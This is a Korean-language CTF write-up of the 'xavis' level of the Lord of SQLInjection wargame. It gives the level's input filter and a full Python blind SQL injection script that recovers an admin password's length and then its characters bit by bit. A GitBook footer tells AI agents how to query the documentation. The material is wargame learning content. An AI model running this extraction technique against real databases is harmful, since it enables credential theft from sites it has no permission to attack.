> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-xavis.md).

# \[Lord of SQLInjection] xavis

<figure><img src="https://blog.kakaocdn.net/dna/uNMor/btsMC9XWaEL/AAAAAAAAAAAAAAAAAAAAAKFXL3O3Jz_3CaXYdjeT-Pw4ZXBbx2lvlBPSyptVa-uQ/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=159YE0VPP3uiUlDU69haqbkPHYw%3D" alt="" height="336" width="583"><figcaption></figcaption></figure>

```
if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/regex|like/i', $_GET[pw])) exit("HeHe");
```

→ 여기서 역대 문제들 중에서 regex라는 함수가 첫 등장을 한다.

* regex란?
  * 다중 like 문을 사용해야 할때 간단하게 줄여주는 함수

```
from requests import get

url = ### xavis의 URL ###
cookie = dict(PHPSESSID="### 자신의 PHPSESSID ####")
length = 0
password = ''

print("### find for pw length ###")
while(True) :
    param = "?pw=1232%27%20or%20length(pw)>"+str(length)+"%23"
    new_url = url+param
    rec = get(new_url,cookies=cookie)

    if(rec.text.find("Hello admin") == -1) :
        print("find pw length : "+str(length))
        break
    
    print("fail to find pw length : "+str(length))
    length+=1

print("### find for actual password ###")
for i in range(1,length+1) :
    temp_bit=''
    for j in range(1,17) :
        param = "?pw=1234%27%20or%20id=%27admin%27%20and%20substr(lpad(bin(ord(substr(pw,"+str(i)+",1))),16,0),"+str(j)+",1)=1--%20"
        new_url = url+param
        rec = get(new_url,cookies=cookie)

        if(rec.text.find("Hello admin")>=0) :
            print("add bit 1 for ",i,"'s letters")
            temp_bit+="1"
        else :
            print("add bit 0 for ",i,"'s letters")
            temp_bit+="0"
    
    password += chr(int(temp_bit,base=2))
    
    print("current password",chr(int(temp_bit,base=2)),hex(int(temp_bit,base=2)))

print("Found password :",password)
```

* lpad : 글자 수를 먼저 맞추고 왼쪽에 공백만큼 특정 문자를 채움
  * lpad(값, 글자수, 채우는 문자)
* bin : 숫자를 2진법 형태로 변환하는 함수
  * bin(number)

→ 이전 blind injection과 다르게 pw는 유니코드로 이루어져있고, 한글자당 4byte로 구성되어있음

→ 꼭 숫자나 영어가 아니라 한글로 이루어져 있을 수 있겠다는 추론이 가능

→ 해당 코드를 통해 브루트 포스를 사용한다.

→ password 값은 한글인 “우왕굳”으로 나온다.

<figure><img src="https://blog.kakaocdn.net/dna/bCsoo8/btsMDyXej70/AAAAAAAAAAAAAAAAAAAAAB4W_FOBNkUzMg7C7mwhWDvS4yhYXobgkFdT5drfAKhm/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Mjw9kayafdKd11oozUVwil5K3F8%3D" alt="" height="470" width="698"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-xavis.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.